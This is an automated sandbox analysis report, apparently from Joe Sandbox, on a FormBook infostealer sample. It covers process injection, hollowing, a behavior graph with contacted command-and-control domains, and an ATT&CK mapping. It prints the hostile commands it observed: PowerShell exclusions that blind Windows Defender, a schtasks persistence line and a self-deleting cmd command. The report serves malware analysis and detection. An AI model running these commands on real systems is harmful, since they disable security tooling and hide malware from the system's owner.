          Source: Ms5nQdSz5l.exe, ProcessClass.cs | Reference to suspicious API methods: ('OpenProcess', 'OpenProcess@kernel32.dll')
          Source: zFVxYeAVOjnwuB.exe.0.dr, Memory.cs | Reference to suspicious API methods: ('WriteProcessMemory', 'WriteProcessMemory@kernel32.dll'), ('ReadProcessMemory', 'ReadProcessMemory@kernel32.dll')
          Source: zFVxYeAVOjnwuB.exe.0.dr, ProcessClass.cs | Reference to suspicious API methods: ('OpenProcess', 'OpenProcess@kernel32.dll')
          Source: 0.0.Ms5nQdSz5l.exe.c40000.0.unpack, Memory.cs | Reference to suspicious API methods: ('WriteProcessMemory', 'WriteProcessMemory@kernel32.dll'), ('ReadProcessMemory', 'ReadProcessMemory@kernel32.dll')
          Source: 0.0.Ms5nQdSz5l.exe.c40000.0.unpack, ProcessClass.cs | Reference to suspicious API methods: ('OpenProcess', 'OpenProcess@kernel32.dll')
          Source: 0.2.Ms5nQdSz5l.exe.c40000.0.unpack, Memory.cs | Reference to suspicious API methods: ('WriteProcessMemory', 'WriteProcessMemory@kernel32.dll'), ('ReadProcessMemory', 'ReadProcessMemory@kernel32.dll')
          Source: 0.2.Ms5nQdSz5l.exe.c40000.0.unpack, ProcessClass.cs | Reference to suspicious API methods: ('OpenProcess', 'OpenProcess@kernel32.dll')
          Source: 9.0.Ms5nQdSz5l.exe.620000.0.unpack, Memory.cs | Reference to suspicious API methods: ('WriteProcessMemory', 'WriteProcessMemory@kernel32.dll'), ('ReadProcessMemory', 'ReadProcessMemory@kernel32.dll')
          Source: 9.0.Ms5nQdSz5l.exe.620000.0.unpack, ProcessClass.cs | Reference to suspicious API methods: ('OpenProcess', 'OpenProcess@kernel32.dll')
          Source: 9.2.Ms5nQdSz5l.exe.620000.1.unpack, Memory.cs | Reference to suspicious API methods: ('WriteProcessMemory', 'WriteProcessMemory@kernel32.dll'), ('ReadProcessMemory', 'ReadProcessMemory@kernel32.dll')
          Source: 9.2.Ms5nQdSz5l.exe.620000.1.unpack, ProcessClass.cs | Reference to suspicious API methods: ('OpenProcess', 'OpenProcess@kernel32.dll')
          Adds a directory exclusion to Windows Defender
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Ms5nQdSz5l.exe'
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe'
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe'
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Ms5nQdSz5l.exe'
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe'
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe'
          Injects a PE file into a foreign process
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Memory written: C:\Users\user\Desktop\Ms5nQdSz5l.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Section loaded: unknown target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Section loaded: unknown target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\mstsc.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\mstsc.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Thread register set: target process: 3472
          Source: C:\Windows\SysWOW64\mstsc.exe | Thread register set: target process: 3472
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Thread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Section unmapped: C:\Windows\SysWOW64\mstsc.exe base address: C70000
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Ms5nQdSz5l.exe'
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe'
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\zFVxYeAVOjnwuB' /XML 'C:\Users\user\AppData\Local\Temp\tmp7635.tmp'
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe'
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Process created: C:\Users\user\Desktop\Ms5nQdSz5l.exe C:\Users\user\Desktop\Ms5nQdSz5l.exe
          Source: C:\Windows\SysWOW64\mstsc.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Ms5nQdSz5l.exe'
          Source: explorer.exe, 0000000B.00000000.330501605.00000000089FF000.00000004.00000001.sdmp | Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 0000000B.00000000.251142593.0000000001640000.00000002.00000001.sdmp | Binary or memory string: Progman
          Source: explorer.exe, 0000000B.00000000.251142593.0000000001640000.00000002.00000001.sdmp | Binary or memory string: SProgram Managerl
          Source: explorer.exe, 0000000B.00000002.496125004.0000000001128000.00000004.00000020.sdmp | Binary or memory string: ProgmanOMEa
          Source: explorer.exe, 0000000B.00000000.251142593.0000000001640000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd,
          Source: explorer.exe, 0000000B.00000000.251142593.0000000001640000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Queries volume information: C:\Users\user\Desktop\Ms5nQdSz5l.exe VolumeInformation
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match | File source: 00000017.00000002.502856017.0000000003130000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.388008675.0000000001400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000017.00000002.492458360.0000000000AD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.379229616.0000000000C70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000017.00000002.503223323.0000000003160000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.374453339.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.250065201.00000000040A9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 9.2.Ms5nQdSz5l.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 9.2.Ms5nQdSz5l.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara match | File source: 00000017.00000002.502856017.0000000003130000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.388008675.0000000001400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000017.00000002.492458360.0000000000AD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.379229616.0000000000C70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000017.00000002.503223323.0000000003160000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.374453339.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.250065201.00000000040A9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 9.2.Ms5nQdSz5l.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 9.2.Ms5nQdSz5l.exe.400000.0.raw.unpack, type: UNPACKEDPE

          MITRE ATT&CK Matrix

          Techniques are listed per tactic; a superscript after a technique name is the signature count the report attached to it (techniques without a count are the matrix's unpopulated cells).

          Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application
          Execution: Native API¹, Shared Modules¹, Scheduled Task/Job¹, At (Windows), Cron, Launchd, Scheduled Task, Command and Scripting Interpreter, PowerShell
          Persistence: Scheduled Task/Job¹, Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common, Startup Items, Scheduled Task/Job, At (Linux)
          Privilege Escalation: Process Injection⁶¹², Scheduled Task/Job¹, Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common, Startup Items, Scheduled Task/Job, At (Linux)
          Defense Evasion: Disable or Modify Tools¹¹, Deobfuscate/Decode Files or Information¹, Obfuscated Files or Information³, Software Packing³, Timestomp¹, Rootkit¹, Masquerading¹, Virtualization/Sandbox Evasion⁴¹, Process Injection⁶¹²
          Credential Access: Credential API Hooking¹, Input Capture¹, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem, /etc/passwd and /etc/shadow
          Discovery: File and Directory Discovery¹, System Information Discovery¹¹², Query Registry¹, Security Software Discovery²³¹, Process Discovery², Virtualization/Sandbox Evasion⁴¹, Application Window Discovery¹, Remote System Discovery¹, System Network Connections Discovery
          Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Shared Webroot, Software Deployment Tools
          Collection: Archive Collected Data¹, Credential API Hooking¹, Input Capture¹, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking, Data Staged
          Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol, Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
          Command and Control: Ingress Tool Transfer¹, Encrypted Channel¹, Non-Application Layer Protocol², Application Layer Protocol¹², Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol, Web Protocols
          Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication, Jamming or Denial of Service, Rogue Wi-Fi Access Points, Downgrade to Insecure Protocols, Rogue Cellular Base Station
          Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups
          Impact: Modify System Partition, Device Lockout, Delete Device Data, Carrier Billing Fraud, Manipulate App Store Rankings or Ratings, Abuse Accessibility Features, Data Encrypted for Impact, Generate Fraudulent Advertising Revenue, Data Destruction

          Behavior Graph

          Behavior Graph ID: 404105 | Sample: Ms5nQdSz5l.exe | Startdate: 04/05/2021 | Architecture: WINDOWS | Score: 100

          Start
            DNS/IP: www.4980057280880200.xyz
            Signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 9 other signatures
            Ms5nQdSz5l.exe (started)
              Dropped: C:\Users\user\AppData\...\zFVxYeAVOjnwuB.exe (PE32); C:\...\zFVxYeAVOjnwuB.exe:Zone.Identifier (ASCII); C:\Users\user\AppData\Local\...\tmp7635.tmp (XML); C:\Users\user\AppData\...\Ms5nQdSz5l.exe.log (ASCII)
              Signatures: Uses schtasks.exe or at.exe to add and modify task schedules; Adds a directory exclusion to Windows Defender; Tries to detect virtualization through RDTSC time measurements; Injects a PE file into a foreign processes
              Ms5nQdSz5l.exe (started)
                Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
                explorer.exe (injected)
                  DNS/IP: www.safifinancial.info; safifinancial.info 34.102.136.180, 49717, 80 GOOGLEUS United States
                  Signatures: System process connects to network (likely due to code injection or exploit)
                  mstsc.exe (started)
                    Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                    cmd.exe (started)
                      conhost.exe (started)
              powershell.exe (started)
                conhost.exe (started)
              powershell.exe (started)
                conhost.exe (started)
              2 other processes
                conhost.exe (started)
                conhost.exe (started)

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          Ms5nQdSz5l.exe | 26% | Virustotal |
          Ms5nQdSz5l.exe | 100% | Joe Sandbox ML |

          Dropped Files

          Source | Detection | Scanner | Label
          C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe | 100% | Joe Sandbox ML |

          Unpacked PE Files

          Source | Detection | Scanner | Label
          9.2.Ms5nQdSz5l.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          No Antivirus matches

          URLs

Source | Detection | Scanner | Label
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
https://go.micro | 0% | URL Reputation | safe
http://crl.microszt | 0% | Avira URL Cloud | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
